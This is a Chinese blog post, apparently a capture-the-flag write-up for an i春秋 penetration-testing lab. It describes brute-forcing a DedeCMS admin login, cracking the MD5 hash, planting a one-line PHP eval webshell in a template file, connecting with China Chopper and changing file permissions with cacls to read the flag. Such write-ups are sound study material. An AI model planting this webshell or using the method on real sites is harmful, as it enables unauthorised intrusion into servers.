i春秋渗透模拟第一题,真的很简单(并不
照着别人wp做的
进入后界面如下,
![](https://img.haomeiwen.com/i14417137/736c85c41c9e228b.png)
点击开始答题后出现第一题为后台密码
![](https://img.haomeiwen.com/i14417137/97d2955dae3c9991.png)
这里就不知道咋做了。。。
后来看了下wp发现提示了要用给出的地址下载dedecms爆破密码(为啥我没有),如下图:
![](https://img.haomeiwen.com/i14417137/8904071da6008d9d.png)
访问该地址下载dedecms工具后直接爆破得出用户名ichunqiu和md5加密后的密码:adab29e084ff095ce3eb
![](https://img.haomeiwen.com/i14417137/02dd37a0b3e41beb.png)
然后去https://www.cmd5.com/
上解密发现要付费???
在这里解密成功得到密码:only_systemhttps://www.somd5.com/
![](https://img.haomeiwen.com/i14417137/d16bd0d8b3606c61.png)
提交后出现第二题为后台目录
![](https://img.haomeiwen.com/i14417137/31d1534f3756ab09.png)
又不会了,继续看wp
![](https://img.haomeiwen.com/i14417137/a0348329dc3008c1.png)
![](https://img.haomeiwen.com/i14417137/59394365a5252d21.png)
可知目录名为lichunqiul,提交后出现第三题
![](https://img.haomeiwen.com/i14417137/5bbb1f5485199b99.png)
首先用第一步得到的用户和密码以及第二步得到的路径登入后台
![](https://img.haomeiwen.com/i14417137/ed59beca1a38f7dc.png)
要求我们获取桌面的文件,需要构造webshell连接服务器,要找到可以上传文件的地方,但是既然已经登入,直接修改已存在的文件即可。
找到模板-标签源码管理,选择一个,编辑,在第一行加上
<?php @eval($_POST["cmd"]);?>
然后保存。打开中国菜刀,![](https://img.haomeiwen.com/i14417137/c656ec4dd0d7a09c.png)
(完整地址为http://www.test.ichunqiu/include/taglib/adminname.lib.php,即加入shell的文件)
连接后找到flag文件后双击为空白,看wp知道是因为权限原因,虚拟终端查看权限
![](https://img.haomeiwen.com/i14417137/ddcc5f6c31e014a9.png)
发现是因为权限不足,用
cacls flag~ichunqiu.txt /E /P system:F
命令更改权限,之后再双击即可得到flag:
![](https://img.haomeiwen.com/i14417137/6daf940546e4aca2.png)
提交后即完成全部题目
(注意仅提交大括号内部分)
总结:看了别人wp之后,题目就会变简单
网友评论